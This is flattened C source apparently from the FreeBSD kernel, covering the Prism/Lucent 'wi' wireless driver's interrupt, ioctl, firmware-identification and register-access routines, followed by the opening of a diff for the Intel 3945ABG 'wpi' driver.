callout_reset(&sc->sc_watchdog, hz, wi_watchdog, sc); } static int wi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct wi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: WI_LOCK(sc); /* * Can't do promisc and hostap at the same time. If all that's * changing is the promisc flag, try to short-circuit a call to * wi_init() by just setting PROMISC in the hardware. */ if (ifp->if_flags & IFF_UP) { if (ic->ic_opmode != IEEE80211_M_HOSTAP && ifp->if_drv_flags & IFF_DRV_RUNNING) { if ((ifp->if_flags ^ sc->sc_if_flags) & IFF_PROMISC) { wi_write_val(sc, WI_RID_PROMISC, (ifp->if_flags & IFF_PROMISC) != 0); } else { wi_init_locked(sc); startall = 1; } } else { wi_init_locked(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) wi_stop_locked(sc, 1); sc->wi_gone = 0; } sc->sc_if_flags = ifp->if_flags; WI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void wi_media_status(struct ifnet *ifp, struct ifmediareq *imr) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct wi_softc *sc = ic->ic_ifp->if_softc; u_int16_t val; int rate, len; len = sizeof(val); if (sc->sc_enabled && wi_read_rid(sc, WI_RID_CUR_TX_RATE, &val, &len) == 0 && len == sizeof(val)) { /* convert to 802.11 rate */ val = le16toh(val); rate = val * 2; if (sc->sc_firmware_type == WI_LUCENT) { if (rate == 10) rate = 11; /* 5.5Mbps */ } else { if (rate == 4*2) rate = 11; /* 5.5Mbps */ else if (rate == 8*2) rate = 22; /* 11Mbps */ } vap->iv_bss->ni_txrate = rate; } ieee80211_media_status(ifp, imr); } static void wi_sync_bssid(struct wi_softc *sc, u_int8_t new_bssid[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni = vap->iv_bss; if (IEEE80211_ADDR_EQ(new_bssid, ni->ni_bssid)) return; DPRINTF(("wi_sync_bssid: bssid %s -> ", ether_sprintf(ni->ni_bssid))); DPRINTF(("%s ?\n", ether_sprintf(new_bssid))); /* In promiscuous mode, the BSSID field is not a reliable * indicator of the firmware's BSSID. Damp spurious * change-of-BSSID indications. */ if ((ifp->if_flags & IFF_PROMISC) != 0 && !ppsratecheck(&sc->sc_last_syn, &sc->sc_false_syns, WI_MAX_FALSE_SYNS)) return; sc->sc_false_syns = MAX(0, sc->sc_false_syns - 1); #if 0 /* * XXX hack; we should create a new node with the new bssid * and replace the existing ic_bss with it but since we don't * process management frames to collect state we cheat by * reusing the existing node as we know wi_newstate will be * called and it will overwrite the node state. */ ieee80211_sta_join(ic, ieee80211_ref_node(ni)); #endif } static __noinline void wi_rx_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wi_frame frmhdr; struct mbuf *m; struct ieee80211_frame *wh; struct ieee80211_node *ni; int fid, len, off; u_int8_t dir; u_int16_t status; int8_t rssi, nf; fid = CSR_READ_2(sc, WI_RX_FID); /* First read in the frame header */ if (wi_read_bap(sc, fid, 0, &frmhdr, sizeof(frmhdr))) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: read fid %x failed\n", fid)); return; } /* * Drop undecryptable or packets with receive errors here */ status = le16toh(frmhdr.wi_status); if (status & WI_STAT_ERRSTAT) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: fid %x error status %x\n", fid, status)); return; } len = le16toh(frmhdr.wi_dat_len); off = ALIGN(sizeof(struct ieee80211_frame)); /* * Sometimes the PRISM2.x returns bogusly large frames. Except * in monitor mode, just throw them away. */ if (off + len > MCLBYTES) { if (ic->ic_opmode != IEEE80211_M_MONITOR) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: oversized packet\n")); return; } else len = 0; } if (off + len > MHLEN) m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); else m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: MGET failed\n")); return; } m->m_data += off - sizeof(struct ieee80211_frame); memcpy(m->m_data, &frmhdr.wi_whdr, sizeof(struct ieee80211_frame)); wi_read_bap(sc, fid, sizeof(frmhdr), m->m_data + sizeof(struct ieee80211_frame), len); m->m_pkthdr.len = m->m_len = sizeof(struct ieee80211_frame) + len; m->m_pkthdr.rcvif = ifp; CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); rssi = frmhdr.wi_rx_signal; nf = frmhdr.wi_rx_silence; if (ieee80211_radiotap_active(ic)) { struct wi_rx_radiotap_header *tap = &sc->sc_rx_th; uint32_t rstamp; rstamp = (le16toh(frmhdr.wi_rx_tstamp0) << 16) | le16toh(frmhdr.wi_rx_tstamp1); tap->wr_tsf = htole64((uint64_t)rstamp); /* XXX replace divide by table */ tap->wr_rate = frmhdr.wi_rx_rate / 5; tap->wr_flags = 0; if (frmhdr.wi_status & WI_STAT_PCF) tap->wr_flags |= IEEE80211_RADIOTAP_F_CFP; if (m->m_flags & M_WEP) tap->wr_flags |= IEEE80211_RADIOTAP_F_WEP; tap->wr_antsignal = rssi; tap->wr_antnoise = nf; } /* synchronize driver's BSSID with firmware's BSSID */ wh = mtod(m, struct ieee80211_frame *); dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; if (ic->ic_opmode == IEEE80211_M_IBSS && dir == IEEE80211_FC1_DIR_NODS) wi_sync_bssid(sc, wh->i_addr3); WI_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); WI_LOCK(sc); } static __noinline void wi_tx_ex_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct wi_frame frmhdr; int fid; fid = CSR_READ_2(sc, WI_TX_CMP_FID); /* Read in the frame header */ if (wi_read_bap(sc, fid, 0, &frmhdr, sizeof(frmhdr)) == 0) { u_int16_t status = le16toh(frmhdr.wi_status); /* * Spontaneous station disconnects appear as xmit * errors. Don't announce them and/or count them * as an output error. */ if ((status & WI_TXSTAT_DISCONNECT) == 0) { if (ppsratecheck(&lasttxerror, &curtxeps, wi_txerate)) { if_printf(ifp, "tx failed"); if (status & WI_TXSTAT_RET_ERR) printf(", retry limit exceeded"); if (status & WI_TXSTAT_AGED_ERR) printf(", max transmit lifetime exceeded"); if (status & WI_TXSTAT_DISCONNECT) printf(", port disconnected"); if (status & WI_TXSTAT_FORM_ERR) printf(", invalid format (data len %u src %6D)", le16toh(frmhdr.wi_dat_len), frmhdr.wi_ehdr.ether_shost, ":"); if (status & ~0xf) printf(", status=0x%x", status); printf("\n"); } ifp->if_oerrors++; } else { DPRINTF(("port disconnected\n")); ifp->if_collisions++; /* XXX */ } } else DPRINTF(("wi_tx_ex_intr: read fid %x failed\n", fid)); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_TX_EXC); } static __noinline void wi_tx_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int fid, cur; if (sc->wi_gone) return; fid = CSR_READ_2(sc, WI_ALLOC_FID); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_ALLOC); cur = sc->sc_txcur; if (sc->sc_txd[cur].d_fid != fid) { if_printf(ifp, "bad alloc %x != %x, cur %d nxt %d\n", fid, sc->sc_txd[cur].d_fid, cur, sc->sc_txnext); return; } sc->sc_tx_timer = 0; sc->sc_txd[cur].d_len = 0; sc->sc_txcur = cur = (cur + 1) % sc->sc_ntxbuf; if (sc->sc_txd[cur].d_len == 0) ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; else { if (wi_cmd(sc, WI_CMD_TX | WI_RECLAIM, sc->sc_txd[cur].d_fid, 0, 0)) { if_printf(ifp, "xmit failed\n"); sc->sc_txd[cur].d_len = 0; } else { sc->sc_tx_timer = 5; } } } static __noinline void wi_info_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); int i, fid, len, off; u_int16_t ltbuf[2]; u_int16_t stat; u_int32_t *ptr; fid = CSR_READ_2(sc, WI_INFO_FID); wi_read_bap(sc, fid, 0, ltbuf, sizeof(ltbuf)); switch (le16toh(ltbuf[1])) { case WI_INFO_LINK_STAT: wi_read_bap(sc, fid, sizeof(ltbuf), &stat, sizeof(stat)); DPRINTF(("wi_info_intr: LINK_STAT 0x%x\n", le16toh(stat))); if (vap == NULL) goto finish; switch (le16toh(stat)) { case WI_INFO_LINK_STAT_CONNECTED: if (vap->iv_state == IEEE80211_S_RUN && vap->iv_opmode != IEEE80211_M_IBSS) break; /* fall thru... */ case WI_INFO_LINK_STAT_AP_CHG: IEEE80211_LOCK(ic); vap->iv_bss->ni_associd = 1 | 0xc000; /* NB: anything will do */ ieee80211_new_state(vap, IEEE80211_S_RUN, 0); IEEE80211_UNLOCK(ic); break; case WI_INFO_LINK_STAT_AP_INR: break; case WI_INFO_LINK_STAT_DISCONNECTED: /* we dropped off the net; e.g. due to deauth/disassoc */ IEEE80211_LOCK(ic); vap->iv_bss->ni_associd = 0; vap->iv_stats.is_rx_deauth++; ieee80211_new_state(vap, IEEE80211_S_SCAN, 0); IEEE80211_UNLOCK(ic); break; case WI_INFO_LINK_STAT_AP_OOR: /* XXX does this need to be per-vap? */ ieee80211_beacon_miss(ic); break; case WI_INFO_LINK_STAT_ASSOC_FAILED: if (vap->iv_opmode == IEEE80211_M_STA) ieee80211_new_state(vap, IEEE80211_S_SCAN, IEEE80211_SCAN_FAIL_TIMEOUT); break; } break; case WI_INFO_COUNTERS: /* some card versions have a larger stats structure */ len = min(le16toh(ltbuf[0]) - 1, sizeof(sc->sc_stats) / 4); ptr = (u_int32_t *)&sc->sc_stats; off = sizeof(ltbuf); for (i = 0; i < len; i++, off += 2, ptr++) { wi_read_bap(sc, fid, off, &stat, sizeof(stat)); #ifdef WI_HERMES_STATS_WAR if (stat & 0xf000) stat = ~stat; #endif *ptr += stat; } ifp->if_collisions = sc->sc_stats.wi_tx_single_retries + sc->sc_stats.wi_tx_multi_retries + sc->sc_stats.wi_tx_retry_limit; break; default: DPRINTF(("wi_info_intr: got fid %x type %x len %d\n", fid, le16toh(ltbuf[1]), le16toh(ltbuf[0]))); break; } finish: CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_INFO); } static int wi_write_multi(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int n; struct ifmultiaddr *ifma; struct wi_mcast mlist; if (ifp->if_flags & IFF_ALLMULTI || ifp->if_flags & IFF_PROMISC) { allmulti: memset(&mlist, 0, sizeof(mlist)); return wi_write_rid(sc, WI_RID_MCAST_LIST, &mlist, sizeof(mlist)); } n = 0; if_maddr_rlock(ifp); TAILQ_FOREACH(ifma, &ifp->if_multiaddrs, ifma_link) { if (ifma->ifma_addr->sa_family != AF_LINK) continue; if (n >= 16) goto allmulti; IEEE80211_ADDR_COPY(&mlist.wi_mcast[n], (LLADDR((struct sockaddr_dl *)ifma->ifma_addr))); n++; } if_maddr_runlock(ifp); return wi_write_rid(sc, WI_RID_MCAST_LIST, &mlist, IEEE80211_ADDR_LEN * n); } static void wi_update_mcast(struct ifnet *ifp) { wi_write_multi(ifp->if_softc); } static void wi_update_promisc(struct ifnet *ifp) { struct wi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; WI_LOCK(sc); /* XXX handle WEP special case handling? */ wi_write_val(sc, WI_RID_PROMISC, (ic->ic_opmode == IEEE80211_M_MONITOR || (ifp->if_flags & IFF_PROMISC))); WI_UNLOCK(sc); } static void wi_read_nicid(struct wi_softc *sc) { struct wi_card_ident *id; char *p; int len; u_int16_t ver[4]; /* getting chip identity */ memset(ver, 0, sizeof(ver)); len = sizeof(ver); wi_read_rid(sc, WI_RID_CARD_ID, ver, &len); sc->sc_firmware_type = WI_NOTYPE; sc->sc_nic_id = le16toh(ver[0]); for (id = wi_card_ident; id->card_name != NULL; id++) { if (sc->sc_nic_id == id->card_id) { sc->sc_nic_name = id->card_name; sc->sc_firmware_type = id->firm_type; break; } } if (sc->sc_firmware_type == WI_NOTYPE) { if (sc->sc_nic_id & 0x8000) { sc->sc_firmware_type = WI_INTERSIL; sc->sc_nic_name = "Unknown Prism chip"; } else { sc->sc_firmware_type = WI_LUCENT; sc->sc_nic_name = "Unknown Lucent chip"; } } if (bootverbose) device_printf(sc->sc_dev, "using %s\n", sc->sc_nic_name); /* get primary firmware version (Only Prism chips) */ if (sc->sc_firmware_type != WI_LUCENT) { memset(ver, 0, sizeof(ver)); len = sizeof(ver); wi_read_rid(sc, WI_RID_PRI_IDENTITY, ver, &len); sc->sc_pri_firmware_ver = le16toh(ver[2]) * 10000 + le16toh(ver[3]) * 100 + le16toh(ver[1]); } /* get station firmware version */ memset(ver, 0, sizeof(ver)); len = sizeof(ver); wi_read_rid(sc, WI_RID_STA_IDENTITY, ver, &len); sc->sc_sta_firmware_ver = le16toh(ver[2]) * 10000 + le16toh(ver[3]) * 100 + le16toh(ver[1]); if (sc->sc_firmware_type == WI_INTERSIL && (sc->sc_sta_firmware_ver == 10102 || sc->sc_sta_firmware_ver == 20102)) { char ident[12]; memset(ident, 0, sizeof(ident)); len = sizeof(ident); /* value should be the format like "V2.00-11" */ if (wi_read_rid(sc, WI_RID_SYMBOL_IDENTITY, ident, &len) == 0 && *(p = (char *)ident) >= 'A' && p[2] == '.' && p[5] == '-' && p[8] == '\0') { sc->sc_firmware_type = WI_SYMBOL; sc->sc_sta_firmware_ver = (p[1] - '0') * 10000 + (p[3] - '0') * 1000 + (p[4] - '0') * 100 + (p[6] - '0') * 10 + (p[7] - '0'); } } if (bootverbose) { device_printf(sc->sc_dev, "%s Firmware: ", wi_firmware_names[sc->sc_firmware_type]); if (sc->sc_firmware_type != WI_LUCENT) /* XXX */ printf("Primary (%u.%u.%u), ", sc->sc_pri_firmware_ver / 10000, (sc->sc_pri_firmware_ver % 10000) / 100, sc->sc_pri_firmware_ver % 100); printf("Station (%u.%u.%u)\n", sc->sc_sta_firmware_ver / 10000, (sc->sc_sta_firmware_ver % 10000) / 100, sc->sc_sta_firmware_ver % 100); } } static int wi_write_ssid(struct wi_softc *sc, int rid, u_int8_t *buf, int buflen) { struct wi_ssid ssid; if (buflen > IEEE80211_NWID_LEN) return ENOBUFS; memset(&ssid, 0, sizeof(ssid)); ssid.wi_len = htole16(buflen); memcpy(ssid.wi_ssid, buf, buflen); return wi_write_rid(sc, rid, &ssid, sizeof(ssid)); } static int wi_write_txrate(struct wi_softc *sc, struct ieee80211vap *vap) { static const uint16_t lucent_rates[12] = { [ 0] = 3, /* auto */ [ 1] = 1, /* 1Mb/s */ [ 2] = 2, /* 2Mb/s */ [ 5] = 4, /* 5.5Mb/s */ [11] = 5 /* 11Mb/s */ }; static const uint16_t intersil_rates[12] = { [ 0] = 0xf, /* auto */ [ 1] = 0, /* 1Mb/s */ [ 2] = 1, /* 2Mb/s */ [ 5] = 2, /* 5.5Mb/s */ [11] = 3, /* 11Mb/s */ }; const uint16_t *rates = sc->sc_firmware_type == WI_LUCENT ? lucent_rates : intersil_rates; struct ieee80211com *ic = vap->iv_ic; const struct ieee80211_txparam *tp; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_bsschan)]; return wi_write_val(sc, WI_RID_TX_RATE, (tp->ucastrate == IEEE80211_FIXED_RATE_NONE ? rates[0] : rates[tp->ucastrate / 2])); } static int wi_write_wep(struct wi_softc *sc, struct ieee80211vap *vap) { int error = 0; int i, keylen; u_int16_t val; struct wi_key wkey[IEEE80211_WEP_NKID]; switch (sc->sc_firmware_type) { case WI_LUCENT: val = (vap->iv_flags & IEEE80211_F_PRIVACY) ? 1 : 0; error = wi_write_val(sc, WI_RID_ENCRYPTION, val); if (error) break; if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) break; error = wi_write_val(sc, WI_RID_TX_CRYPT_KEY, vap->iv_def_txkey); if (error) break; memset(wkey, 0, sizeof(wkey)); for (i = 0; i < IEEE80211_WEP_NKID; i++) { keylen = vap->iv_nw_keys[i].wk_keylen; wkey[i].wi_keylen = htole16(keylen); memcpy(wkey[i].wi_keydat, vap->iv_nw_keys[i].wk_key, keylen); } error = wi_write_rid(sc, WI_RID_DEFLT_CRYPT_KEYS, wkey, sizeof(wkey)); sc->sc_encryption = 0; break; case WI_INTERSIL: val = HOST_ENCRYPT | HOST_DECRYPT; if (vap->iv_flags & IEEE80211_F_PRIVACY) { /* * ONLY HWB3163 EVAL-CARD Firmware version * less than 0.8 variant2 * * If promiscuous mode disable, Prism2 chip * does not work with WEP . * It is under investigation for details. * (ichiro@netbsd.org) */ if (sc->sc_sta_firmware_ver < 802 ) { /* firm ver < 0.8 variant 2 */ wi_write_val(sc, WI_RID_PROMISC, 1); } wi_write_val(sc, WI_RID_CNFAUTHMODE, vap->iv_bss->ni_authmode); val |= PRIVACY_INVOKED; } else { wi_write_val(sc, WI_RID_CNFAUTHMODE, IEEE80211_AUTH_OPEN); } error = wi_write_val(sc, WI_RID_P2_ENCRYPTION, val); if (error) break; sc->sc_encryption = val; if ((val & PRIVACY_INVOKED) == 0) break; error = wi_write_val(sc, WI_RID_P2_TX_CRYPT_KEY, vap->iv_def_txkey); break; } return error; } static int wi_cmd(struct wi_softc *sc, int cmd, int val0, int val1, int val2) { int i, s = 0; if (sc->wi_gone) return (ENODEV); /* wait for the busy bit to clear */ for (i = sc->wi_cmd_count; i > 0; i--) { /* 500ms */ if (!(CSR_READ_2(sc, WI_COMMAND) & WI_CMD_BUSY)) break; DELAY(1*1000); /* 1ms */ } if (i == 0) { device_printf(sc->sc_dev, "%s: busy bit won't clear, cmd 0x%x\n", __func__, cmd); sc->wi_gone = 1; return(ETIMEDOUT); } CSR_WRITE_2(sc, WI_PARAM0, val0); CSR_WRITE_2(sc, WI_PARAM1, val1); CSR_WRITE_2(sc, WI_PARAM2, val2); CSR_WRITE_2(sc, WI_COMMAND, cmd); if (cmd == WI_CMD_INI) { /* XXX: should sleep here. */ DELAY(100*1000); /* 100ms delay for init */ } for (i = 0; i < WI_TIMEOUT; i++) { /* * Wait for 'command complete' bit to be * set in the event status register. */ s = CSR_READ_2(sc, WI_EVENT_STAT); if (s & WI_EV_CMD) { /* Ack the event and read result code. */ s = CSR_READ_2(sc, WI_STATUS); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_CMD); if (s & WI_STAT_CMD_RESULT) { return(EIO); } break; } DELAY(WI_DELAY); } if (i == WI_TIMEOUT) { device_printf(sc->sc_dev, "%s: timeout on cmd 0x%04x; " "event status 0x%04x\n", __func__, cmd, s); if (s == 0xffff) sc->wi_gone = 1; return(ETIMEDOUT); } return (0); } static int wi_seek_bap(struct wi_softc *sc, int id, int off) { int i, status; CSR_WRITE_2(sc, WI_SEL0, id); CSR_WRITE_2(sc, WI_OFF0, off); for (i = 0; ; i++) { status = CSR_READ_2(sc, WI_OFF0); if ((status & WI_OFF_BUSY) == 0) break; if (i == WI_TIMEOUT) { device_printf(sc->sc_dev, "%s: timeout, id %x off %x\n", __func__, id, off); sc->sc_bap_off = WI_OFF_ERR; /* invalidate */ if (status == 0xffff) sc->wi_gone = 1; return ETIMEDOUT; } DELAY(1); } if (status & WI_OFF_ERR) { device_printf(sc->sc_dev, "%s: error, id %x off %x\n", __func__, id, off); sc->sc_bap_off = WI_OFF_ERR; /* invalidate */ return EIO; } sc->sc_bap_id = id; sc->sc_bap_off = off; return 0; } static int wi_read_bap(struct wi_softc *sc, int id, int off, void *buf, int buflen) { int error, cnt; if (buflen == 0) return 0; if (id != sc->sc_bap_id || off != sc->sc_bap_off) { if ((error = wi_seek_bap(sc, id, off)) != 0) return error; } cnt = (buflen + 1) / 2; CSR_READ_MULTI_STREAM_2(sc, WI_DATA0, (u_int16_t *)buf, cnt); sc->sc_bap_off += cnt * 2; return 0; } static int wi_write_bap(struct wi_softc *sc, int id, int off, void *buf, int buflen) { int error, cnt; if (buflen == 0) return 0; if (id != sc->sc_bap_id || off != sc->sc_bap_off) { if ((error = wi_seek_bap(sc, id, off)) != 0) return error; } cnt = (buflen + 1) / 2; CSR_WRITE_MULTI_STREAM_2(sc, WI_DATA0, (u_int16_t *)buf, cnt); sc->sc_bap_off += cnt * 2; return 0; } static int wi_mwrite_bap(struct wi_softc *sc, int id, int off, struct mbuf *m0, int totlen) { int error, len; struct mbuf *m; for (m = m0; m != NULL && totlen > 0; m = m->m_next) { if (m->m_len == 0) continue; len = min(m->m_len, totlen); if (((u_long)m->m_data) % 2 != 0 || len % 2 != 0) { m_copydata(m, 0, totlen, (caddr_t)&sc->sc_txbuf); return wi_write_bap(sc, id, off, (caddr_t)&sc->sc_txbuf, totlen); } if ((error = wi_write_bap(sc, id, off, m->m_data, len)) != 0) return error; off += m->m_len; totlen -= len; } return 0; } static int wi_alloc_fid(struct wi_softc *sc, int len, int *idp) { int i; if (wi_cmd(sc, WI_CMD_ALLOC_MEM, len, 0, 0)) { device_printf(sc->sc_dev, "%s: failed to allocate %d bytes on NIC\n", __func__, len); return ENOMEM; } for (i = 0; i < WI_TIMEOUT; i++) { if (CSR_READ_2(sc, WI_EVENT_STAT) & WI_EV_ALLOC) break; DELAY(1); } if (i == WI_TIMEOUT) { device_printf(sc->sc_dev, "%s: timeout in alloc\n", __func__); return ETIMEDOUT; } *idp = CSR_READ_2(sc, WI_ALLOC_FID); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_ALLOC); return 0; } static int wi_read_rid(struct wi_softc *sc, int rid, void *buf, int *buflenp) { int error, len; u_int16_t ltbuf[2]; /* Tell the NIC to enter record read mode. */ error = wi_cmd(sc, WI_CMD_ACCESS | WI_ACCESS_READ, rid, 0, 0); if (error) return error; error = wi_read_bap(sc, rid, 0, ltbuf, sizeof(ltbuf)); if (error) return error; if (le16toh(ltbuf[1]) != rid) { device_printf(sc->sc_dev, "record read mismatch, rid=%x, got=%x\n", rid, le16toh(ltbuf[1])); return EIO; } len = (le16toh(ltbuf[0]) - 1) * 2; /* already got rid */ if (*buflenp < len) { device_printf(sc->sc_dev, "record buffer is too small, " "rid=%x, size=%d, len=%d\n", rid, *buflenp, len); return ENOSPC; } *buflenp = len; return wi_read_bap(sc, rid, sizeof(ltbuf), buf, len); } static int wi_write_rid(struct wi_softc *sc, int rid, void *buf, int buflen) { int error; u_int16_t ltbuf[2]; ltbuf[0] = htole16((buflen + 1) / 2 + 1); /* includes rid */ ltbuf[1] = htole16(rid); error = wi_write_bap(sc, rid, 0, ltbuf, sizeof(ltbuf)); if (error) { device_printf(sc->sc_dev, "%s: bap0 write failure, rid 0x%x\n", __func__, rid); return error; } error = wi_write_bap(sc, rid, sizeof(ltbuf), buf, buflen); if (error) { device_printf(sc->sc_dev, "%s: bap1 write failure, rid 0x%x\n", __func__, rid); return error; } return wi_cmd(sc, WI_CMD_ACCESS | WI_ACCESS_WRITE, rid, 0, 0); } static int wi_write_appie(struct wi_softc *sc, int rid, const struct ieee80211_appie *ie) { /* NB: 42 bytes is probably ok to have on the stack */ char buf[sizeof(uint16_t) + 40]; if (ie->ie_len > 40) return EINVAL; /* NB: firmware requires 16-bit ie length before ie data */ *(uint16_t *) buf = htole16(ie->ie_len); memcpy(buf + sizeof(uint16_t), ie->ie_data, ie->ie_len); return wi_write_rid(sc, rid, buf, ie->ie_len + sizeof(uint16_t)); } int wi_alloc(device_t dev, int rid) { struct wi_softc *sc = device_get_softc(dev); if (sc->wi_bus_type != WI_BUS_PCI_NATIVE) { sc->iobase_rid = rid; sc->iobase = bus_alloc_resource(dev, SYS_RES_IOPORT, &sc->iobase_rid, 0, ~0, (1 << 6), rman_make_alignment_flags(1 << 6) | RF_ACTIVE); if (sc->iobase == NULL) { device_printf(dev, "No I/O space?!\n"); return ENXIO; } sc->wi_io_addr = rman_get_start(sc->iobase); sc->wi_btag = rman_get_bustag(sc->iobase); sc->wi_bhandle = rman_get_bushandle(sc->iobase); } else { sc->mem_rid = rid; sc->mem = bus_alloc_resource_any(dev, SYS_RES_MEMORY, &sc->mem_rid, RF_ACTIVE); if (sc->mem == NULL) { device_printf(dev, "No Mem space on prism2.5?\n"); return ENXIO; } sc->wi_btag = rman_get_bustag(sc->mem); sc->wi_bhandle = rman_get_bushandle(sc->mem); } sc->irq_rid = 0; sc->irq = bus_alloc_resource_any(dev, SYS_RES_IRQ, &sc->irq_rid, RF_ACTIVE | ((sc->wi_bus_type == WI_BUS_PCCARD) ? 0 : RF_SHAREABLE)); if (sc->irq == NULL) { wi_free(dev); device_printf(dev, "No irq?!\n"); return ENXIO; } sc->sc_dev = dev; sc->sc_unit = device_get_unit(dev); return 0; } void wi_free(device_t dev) { struct wi_softc *sc = device_get_softc(dev); if (sc->iobase != NULL) { bus_release_resource(dev, SYS_RES_IOPORT, sc->iobase_rid, sc->iobase); sc->iobase = NULL; } if (sc->irq != NULL) { bus_release_resource(dev, SYS_RES_IRQ, sc->irq_rid, sc->irq); sc->irq = NULL; } if (sc->mem != NULL) { bus_release_resource(dev, SYS_RES_MEMORY, sc->mem_rid, sc->mem); sc->mem = NULL; } } diff --git a/sys/dev/wpi/if_wpi.c b/sys/dev/wpi/if_wpi.c index 6f43addb117e..e85e079306ce 100644 --- a/sys/dev/wpi/if_wpi.c +++ b/sys/dev/wpi/if_wpi.c @@ -1,3716 +1,3716 @@ /*- * Copyright (c) 2006,2007 * Damien Bergamini * Benjamin Close * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #define VERSION "20071127" #include __FBSDID("$FreeBSD$"); /* * Driver for Intel PRO/Wireless 3945ABG 802.11 network adapters. * * The 3945ABG network adapter doesn't use traditional hardware as * many other adaptors do. Instead at run time the eeprom is set into a known * state and told to load boot firmware. The boot firmware loads an init and a * main binary firmware image into SRAM on the card via DMA. * Once the firmware is loaded, the driver/hw then * communicate by way of circular dma rings via the SRAM to the firmware. * * There is 6 memory rings. 1 command ring, 1 rx data ring & 4 tx data rings. * The 4 tx data rings allow for prioritization QoS. * * The rx data ring consists of 32 dma buffers. Two registers are used to * indicate where in the ring the driver and the firmware are up to. The * driver sets the initial read index (reg1) and the initial write index (reg2), * the firmware updates the read index (reg1) on rx of a packet and fires an * interrupt. The driver then processes the buffers starting at reg1 indicating * to the firmware which buffers have been accessed by updating reg2. At the * same time allocating new memory for the processed buffer. * * A similar thing happens with the tx rings. The difference is the firmware * stop processing buffers once the queue is full and until confirmation * of a successful transmition (tx_intr) has occurred. * * The command ring operates in the same manner as the tx queues. * * All communication direct to the card (ie eeprom) is classed as Stage1 * communication * * All communication via the firmware to the card is classed as State2. * The firmware consists of 2 parts. A bootstrap firmware and a runtime * firmware. The bootstrap firmware and runtime firmware are loaded * from host memory via dma to the card then told to execute. From this point * on the majority of communications between the driver and the card goes * via the firmware. */ #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define WPI_DEBUG #ifdef WPI_DEBUG #define DPRINTF(x) do { if (wpi_debug != 0) printf x; } while (0) #define DPRINTFN(n, x) do { if (wpi_debug & n) printf x; } while (0) #define WPI_DEBUG_SET (wpi_debug != 0) enum { WPI_DEBUG_UNUSED = 0x00000001, /* Unused */ WPI_DEBUG_HW = 0x00000002, /* Stage 1 (eeprom) debugging */ WPI_DEBUG_TX = 0x00000004, /* Stage 2 TX intrp debugging*/ WPI_DEBUG_RX = 0x00000008, /* Stage 2 RX intrp debugging */ WPI_DEBUG_CMD = 0x00000010, /* Stage 2 CMD intrp debugging*/ WPI_DEBUG_FIRMWARE = 0x00000020, /* firmware(9) loading debug */ WPI_DEBUG_DMA = 0x00000040, /* DMA (de)allocations/syncs */ WPI_DEBUG_SCANNING = 0x00000080, /* Stage 2 Scanning debugging */ WPI_DEBUG_NOTIFY = 0x00000100, /* State 2 Noftif intr debug */ WPI_DEBUG_TEMP = 0x00000200, /* TXPower/Temp Calibration */ WPI_DEBUG_OPS = 0x00000400, /* wpi_ops taskq debug */ 